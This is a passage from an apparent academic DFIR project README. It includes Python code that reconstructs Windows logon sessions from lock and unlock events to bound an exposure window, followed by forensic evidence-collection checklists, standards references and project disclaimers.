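            elif e["EventID"] == 4801 and s["locks"] and s["locks"][-1][1] is None:
                s["locks"][-1][1] = e["time"]
    return list(sessions.values())


def unlocked_console_sessions(sessions, at):
    """Interactive sessions that were logged on and not locked at instant `at`."""
    hits = []
    for s in sessions:
        if s["logon_type"] not in ("Interactive", "RemoteInteractive"):
            continue  # network logons never present a desktop
        if s["logon"] > at or (s["logoff"] and s["logoff"] <= at):
            continue
        locked = any(start <= at and (end is None or at < end) for start, end in s["locks"])
        if not locked:
            hits.append(s)
    return hits


if __name__ == "__main__":
    sessions = reconstruct_sessions(parse(SAMPLE))
    for probe in ("2023-05-02T09:30:00Z", "2023-05-02T09:50:00Z"):
        exposed = [s["user"] for s in unlocked_console_sessions(sessions, ts(probe))]
        print(f"{probe}: unlocked console sessions = {exposed or 'none'}")
```

Bounding the exposure window this way (last 4801 before the access, first 4800 or 4634 after it) gives the "time window of unauthorized access" item in the findings a log-backed start and end instead of an estimate from the interview.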

Evidence Collection:

Windows Artifacts:
  - Prefetch files (recent program execution)
  - Recent documents (payroll files accessed)
  - Browser history (web-based payroll access)
  - Registry UserAssist (GUI program usage)
  - Event logs (authentication, process creation)

Network Evidence:
  - Firewall logs (outbound connections)
  - Proxy logs (data exfiltration attempts)
  - DHCP logs (device identification)

Findings Documentation:

  • Actions performed on payroll system
  • Data accessed/exfiltrated
  • Time window of unauthorized access
  • Attribution (physical security footage)

📖 References

Official Standards & Frameworks

  • NIST SP 800-61 Rev 2: Computer Security Incident Handling Guide
  • NIST SP 800-86: Guide to Integrating Forensic Techniques into Incident Response
  • RFC 3227: Guidelines for Evidence Collection and Archiving
  • MITRE ATT&CK Framework: Adversary tactics and techniques
  • ISO/IEC 27037: Guidelines for identification, collection, and preservation of digital evidence
  • SANS DFIR: Digital Forensics and Incident Response resources


📝 Developer Notes

Project Context

This is the second part of a two-part academic research thesis on cyber defense operations. Part I focused on proactive defense (SOC, NSM, Threat Intel), while Part II focuses on reactive response (DFIR, Incident Handling).

Academic Details:

  • Institution: Gujarat University
  • Program: M.Sc. IT IMS & CS (Integrated) - Semester 8
  • Mentor: Satender Kumar
  • Submission: May 13, 2023

Ethical & Legal Considerations

Authorized Investigation: All case studies conducted in controlled lab environments
Evidence Handling: Strict chain of custody protocols followed
Legal Compliance: NIST, RFC, and ISO standards adhered to
Educational Purpose: Focus on forensic methodology and incident response procedures
No Real Breaches: Case studies based on simulated scenarios

Limitations

  • Lab environment may not reflect complexity of real-world enterprise incidents
  • Tools and techniques subject to updates (as of May 2023)
  • Case studies based on simplified scenarios for educational purposes
  • Legal testimony requirements vary by jurisdiction
  • Some forensic tools require commercial licenses for production use

Important Disclaimers

Digital Forensics:

  • Always work on forensic copies, never original evidence
  • Maintain detailed chain of custody documentation
  • Hash verification (SHA-256) is mandatory for evidence integrity
  • Legal admissibility requires following proper procedures
  • Consider hiring legal counsel for court cases

Incident Response:

  • Follow organization's IR plan and legal requirements
  • Preserve evidence even during containment activities
  • Document all actions with timestamps
  • Coordinate with legal, HR, and management
  • Consider regulatory reporting requirements (GDPR, HIPAA, etc.)

👤 Developed and Maintained By

Derick Dmello
M.Sc. IT IMS & CS (Integrated)
Gujarat University

About

A comprehensive academic project demonstrating Digital Forensics and Incident Response (DFIR) implementation in Security Operations Centers, with focus on evidence collection, analysis, and systematic incident handling procedures.

License

This academic project report is submitted for educational purposes as part of the M.Sc. IT IMS & CS program at Gujarat University.

Copyright © 2026 Derick Gabriel Dmello. All rights reserved.


Keywords: Digital-Forensics Incident-Response DFIR SOC NIST-SP-800-61 Evidence-Collection Windows-Forensics Linux-Forensics Autopsy FTK-Imager Volatility SOAR SIEM EDR-XDR MITRE-ATTACK Chain-of-Custody Forensic-Analysis Incident-Handling CSIRT Threat-Attribution
